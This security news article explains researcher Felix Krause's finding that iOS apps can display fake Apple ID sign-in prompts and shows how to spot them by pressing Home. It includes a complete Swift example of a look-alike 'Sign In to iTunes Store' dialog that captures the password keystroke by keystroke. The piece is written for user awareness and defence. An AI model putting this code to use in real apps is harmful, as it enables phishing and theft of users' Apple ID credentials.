Since it is usually simpler to trick users into handing over their login credentials than to break into their accounts, phishing scams have existed since the early days of the Internet. Technology has evolved since then, and so have scammers.
Today’s phishing scams can look entirely legitimate and appear at exactly the right moment, that is, in situations where you would expect an official sign-in prompt anyway. Remember the Google Docs scam from earlier this year? It looked perfectly benign, and it certainly was not.
Security researcher Felix Krause points out that iOS users can still be targeted by this kind of phishing, despite all of Apple’s security measures and its review of every app approved for the App Store.
How to spot a fake Apple ID sign-in prompt
A malicious app that managed to get published in the App Store can display a fake Apple ID sign-in prompt that looks just like the ones iOS itself shows. So how do you spot a fake Apple ID sign-in prompt? After all, if you make the mistake of entering your password, not only have you been successfully phished, you may not even be aware of it.
Felix Krause also provides a simple check. An Apple ID sign-in prompt offers two choices: you can either enter the password and tap Sign In, or tap Cancel to close the prompt.
Legitimate and fake Apple sign-in prompts look practically identical, so you cannot tell them apart just by looking at them. What you can do is press the Home button while the prompt is on screen. If the prompt is fake, it disappears together with the app when the app goes to the background, because it is just an ordinary dialog drawn by that app. If the prompt is genuine, it stays on screen, because system dialogs are shown by a separate system process that runs outside the app.
It is also worth noting that you do not even need to tap Sign In on a fake prompt for the malicious app to get your password. Typing it is enough: even if you have entered only a few characters before tapping Cancel (or pressing Home), the app has already captured them, since it can read the text field on every keystroke.
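To make the last two points concrete, here is an added illustration of how such a look-alike prompt works. It is not Krause’s code, which he has not published, and the dialog wording, the `FakeSignInDemo` class, the `observedInput` field and the sample Apple ID are all assumptions for this example. The prompt is a plain `UIAlertController`: it runs inside the app’s own process (so it vanishes with the app when you press Home), and a handler attached to the text field’s `editingChanged` event sees every character as it is typed, so tapping Cancel afterwards changes nothing.

```swift
import UIKit

// Added illustration, not the researcher's unpublished proof of concept.
// A look-alike "Sign In to iTunes Store" prompt built from a normal in-app
// UIAlertController. Because it is drawn by the app itself, pressing the
// Home button hides it together with the app, unlike a real system dialog.
final class FakeSignInDemo: UIViewController {

    // Hypothetical in-memory sink for the keystrokes. A malicious app would
    // send these off-device; this demo only keeps them for printing.
    private(set) var observedInput = ""

    override func viewDidAppear(_ animated: Bool) {
        super.viewDidAppear(animated)
        // Constructed sample value; a real app would know the user's email
        // from its own account data or simply leave the field blank.
        presentLookAlikePrompt(appleID: "user@example.com")
    }

    func presentLookAlikePrompt(appleID: String) {
        // Title and message wording approximate Apple's prompt (assumption).
        let alert = UIAlertController(
            title: "Sign In to iTunes Store",
            message: "Enter the password for the Apple ID \"\(appleID)\".",
            preferredStyle: .alert
        )

        alert.addTextField { field in
            field.placeholder = "Password"
            field.isSecureTextEntry = true
            // editingChanged fires on every keystroke, so the password is
            // observed as it is typed, before either button is tapped.
            field.addTarget(self,
                            action: #selector(self.passwordChanged(_:)),
                            for: .editingChanged)
        }

        // Cancel offers no protection: whatever was typed is already captured.
        alert.addAction(UIAlertAction(title: "Cancel", style: .cancel) { _ in
            print("Cancel tapped; captured so far: \(self.observedInput)")
        })
        alert.addAction(UIAlertAction(title: "Sign In", style: .default) { _ in
            print("Sign In tapped; captured: \(self.observedInput)")
        })

        present(alert, animated: true)
    }

    @objc private func passwordChanged(_ field: UITextField) {
        // Secure text entry hides the characters on screen, but the app that
        // owns the field can still read them.
        observedInput = field.text ?? ""
    }
}
```

Dropping this view controller into an empty iOS app is enough to see both effects: type a few characters, press Home, and the prompt leaves with the app while the console already shows what was typed. A genuine Apple ID prompt, triggered for example by an App Store purchase, survives the same Home press because it is not part of the app at all.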
Apple is generally good at keeping malicious apps out of the App Store, and app review has become considerably faster over the years without, presumably, becoming less thorough. Review is still not a guarantee, however, and a convincing look-alike dialog is exactly the kind of thing that is hard to catch in a review.
That does not mean there is nothing more Apple could do. Krause offers several suggestions. One of them is that any password prompt triggered from within an app should carry the icon of the app that triggered it, a simple but effective way to tell an app-drawn dialog from a system one. Another is for users to refuse to type their Apple ID password into in-app prompts at all and to enter it only in the Settings app.
Please keep in mind that Krause’s demonstration is only a proof of concept. There is no evidence that any app in the App Store actually shows fake Apple ID sign-in prompts, and, for obvious reasons, he has not published his source code.